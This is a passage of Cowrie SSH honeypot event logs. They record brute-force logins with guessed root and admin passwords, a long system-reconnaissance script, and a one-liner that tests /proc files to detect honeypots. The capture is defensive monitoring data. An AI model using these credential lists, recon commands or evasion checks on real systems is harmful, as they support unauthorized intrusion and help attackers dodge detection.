{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.379579Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.380284Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.600501Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.601402Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.603049Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":63557,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b4f978067db","protocol":"ssh","message":"New connection: 186.225.142.90:63557 (1.2.3.4:22) [session: 1b4f978067db]","sensor":"my-vps","timestamp":"2025-08-28T11:13:38.430354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:13:38.747088Z","src_ip":"186.225.142.90","session":"1b4f978067db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T11:13:38.747873Z","src_ip":"186.225.142.90","session":"1b4f978067db"}
{"eventid":"cowrie.login.success","username":"root","password":"0negaii","message":"login attempt [root/0negaii] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:13:40.822359Z","src_ip":"186.225.142.90","session":"1b4f978067db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:13:41.866734Z","src_ip":"186.225.142.90","session":"1b4f978067db"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T11:13:41.867420Z","src_ip":"186.225.142.90","session":"1b4f978067db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:42.634074Z","src_ip":"186.225.142.90","session":"1b4f978067db"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:43.096460Z","src_ip":"186.225.142.90","session":"1b4f978067db"}
{"eventid":"cowrie.session.closed","duration":"302.4","message":"Connection lost after 302.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:45.384029Z","src_ip":"212.227.235.229","session":"a1fbbd002ed2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58840,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e78fac84143","protocol":"ssh","message":"New connection: 212.227.125.160:58840 (1.2.3.4:22) [session: 3e78fac84143]","sensor":"my-vps","timestamp":"2025-08-28T11:13:45.763403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:13:45.861853Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:13:46.006947Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:13:46.783037Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:13:47.605277Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.605968Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.606618Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.607593Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.608725Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.609727Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.610465Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.611840Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.612351Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.612822Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.613326Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.613915Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.614473Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.794158Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.795062Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:47.796118Z","src_ip":"212.227.125.160","session":"3e78fac84143"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7309,"dst_ip":"1.2.3.4","dst_port":22,"session":"888e8d6d9fb1","protocol":"ssh","message":"New connection: 212.227.125.160:7309 (1.2.3.4:22) [session: 888e8d6d9fb1]","sensor":"my-vps","timestamp":"2025-08-28T11:13:48.668125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:13:48.676023Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:13:48.757014Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"atjp4CDA","message":"login attempt [admin/atjp4CDA] failed","sensor":"my-vps","timestamp":"2025-08-28T11:13:49.126472Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:13:50.210365Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.session.connect","src_ip":"130.185.122.7","src_port":58350,"dst_ip":"1.2.3.4","dst_port":22,"session":"0996aa2caada","protocol":"ssh","message":"New connection: 130.185.122.7:58350 (1.2.3.4:22) [session: 0996aa2caada]","sensor":"my-vps","timestamp":"2025-08-28T11:13:50.826800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:13:50.828191Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T11:13:50.868214Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.login.success","username":"root","password":"ADMin@12345","message":"login attempt [root/ADMin@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:13:50.978064Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:13:51.064994Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.065675Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.066162Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.067706Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.068548Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.069639Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.071120Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.072104Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.073047Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.074507Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.075577Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.113965Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.114929Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.117066Z","src_ip":"130.185.122.7","session":"0996aa2caada"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Enercon24","message":"login attempt [admin/Enercon24] failed","sensor":"my-vps","timestamp":"2025-08-28T11:13:51.293749Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1150221410*","message":"login attempt [admin/1150221410*] failed","sensor":"my-vps","timestamp":"2025-08-28T11:13:52.378610Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin12345","message":"login attempt [admin/admin12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:13:53.483329Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:54.586833Z","src_ip":"212.227.125.160","session":"888e8d6d9fb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48686,"dst_ip":"1.2.3.4","dst_port":22,"session":"f741688b3d6e","protocol":"ssh","message":"New connection: 212.227.235.229:48686 (1.2.3.4:22) [session: f741688b3d6e]","sensor":"my-vps","timestamp":"2025-08-28T11:14:05.341067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:14:05.492376Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-